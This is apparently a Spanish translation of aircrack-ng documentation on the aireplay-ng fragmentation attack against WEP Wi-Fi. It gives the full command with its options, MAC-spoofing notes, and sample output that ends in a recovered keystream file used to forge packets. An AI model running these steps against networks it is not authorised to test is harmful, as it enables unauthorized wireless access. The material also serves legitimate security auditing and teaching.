Con este ataque, cuando tiene éxito, podemos obtener 1500 bits de un PRGA (pseudo random generation algorithm). Este ataque no recupera la clave WEP por si mismo, simplemente sirve para conseguir el PRGA. Despues podemos usar el PRGA para generar paquetes con packetforge-ng. Se requiere al menos un paquete de datos recibido del punto de acceso para poder iniciar el ataque.

Básicamente, el programa obtiene una pequeña cantidad de información sobre la clave de un paquete e intenta enviar un ARP y/o paquetes LLC al punto de acceso (AP). Si el paquete es recibido y contestado por el AP de forma satisfactoria, entoces se podrá obtener un poco más de información sobre la clave de ese nuevo paquete enviado por el AP. Este ciclo se repite varias veces hasta que obtenemos los 1500 bits del PRGA o algunas veces se obtienen menos de 1500 bits.

La información original de Andrea Bittau la puedes encontrar en technique_papers que proporciona mucha más información técnica y más detallada. Aquí puedes ver diapositivas de este ataque.

aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D ath0
Donde:

• -5 significa ataque de fragmentación
• -b 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso
• -h 00:0F:B5:AB:CB:9D es la dirección MAC origen de los paquetes que serán inyectados
• ath0 es el nombre de la interface

Opcionalmente, se pueden aplicar los siguientes filtros:

• -b bssid : dirección MAC del punto de acceso
• -d dmac : dirección MACde destino
• -s smac : dirección MAC origen
• -m len : longitud mínima del paquete
• -n len : longitud máxima del paquete
• -u type : frame control, tipo de campo
• -v subt : frame control, subtipo de campo
• -t tods : frame control, A DS bit
• -f fromds : frame control, Desde DS bit
• -w iswep : frame control, WEP bit

Opcionalmente, se pueden utilizar las siguientes opciones:

• -k IP : fijar IP de destino - por defecto 255.255.255.255
• -l IP : fijar IP de origen - por defecto 255.255.255.255

Notas:

• La dirección MAC origen usada en el ataque debe ser la asociada con el punto de acceso. Para ello, se puede realizar una falsa autenticación o usar una dirección MAC de un cliente wireless ya conectado.

• Para los drivers madwifi-ng (chipset Atheros), es necesario cambiar la dirección MAC de la tarjeta por la dirección MAC que se usará para la inyección, sino el ataque no funcionará.

Esencialmente se inicia el ataque con el siguiente comando y seleccionamos el paquete con el que queremos probar:

aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:0F:B5:AB:CB:9D ath0

Waiting for a data packet...
Read 96 packets...

      Size: 120, FromDS: 1, ToDS: 0 (WEP)

           BSSID  =  00:14:6C:7E:40:80
       Dest. MAC  =  00:0F:B5:AB:CB:9D
      Source MAC  =  00:D0:CF:03:34:8C

      0x0000:  0842 0201 000f b5ab cb9d 0014 6c7e 4080  .B..........l~@.
      0x0010:  00d0 cf03 348c e0d2 4001 0000 2b62 7a01  ....4...@...+bz.
      0x0020:  6d6d b1e0 92a8 039b ca6f cecb 5364 6e16  mm.......o..Sdn.
      0x0030:  a21d 2a70 49cf eef8 f9b9 279c 9020 30c4  ..*pI.....'.. 0.
      0x0040:  7013 f7f3 5953 1234 5727 146c eeaa a594  p...YS.4W'.l....
      0x0050:  fd55 66a2 030f 472d 2682 3957 8429 9ca5  .Uf...G-&.9W.)..
      0x0060:  517f 1544 bd82 ad77 fe9a cd99 a43c 52a1  Q.D...w.....<R.
      0x0070:  0505 933f af2f 740e                      ...?./t.

 Use this packet ? y

El programa responde esto (o similar):

 Saving chosen packet in replay_src-0124-161120.cap
 Data packet found!
 Sending fragmented packet
 Got RELAYED packet!!
 Thats our ARP packet!
 Trying to get 384 bytes of a keystream
 Got RELAYED packet!!
 Thats our ARP packet!
 Trying to get 1500 bytes of a keystream
 Got RELAYED packet!!
 Thats our ARP packet!
 Saving keystream in fragment-0124-161129.xor
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

Has obtenido satisfactoriamente el PRGA que está guardado en el archivo nombrado por el programa (fragment-0124-161129.xor). Ahora puedes usar packetforge-ng para generar uno o más paquetes y usarlos con alguno de los ataques de inyección.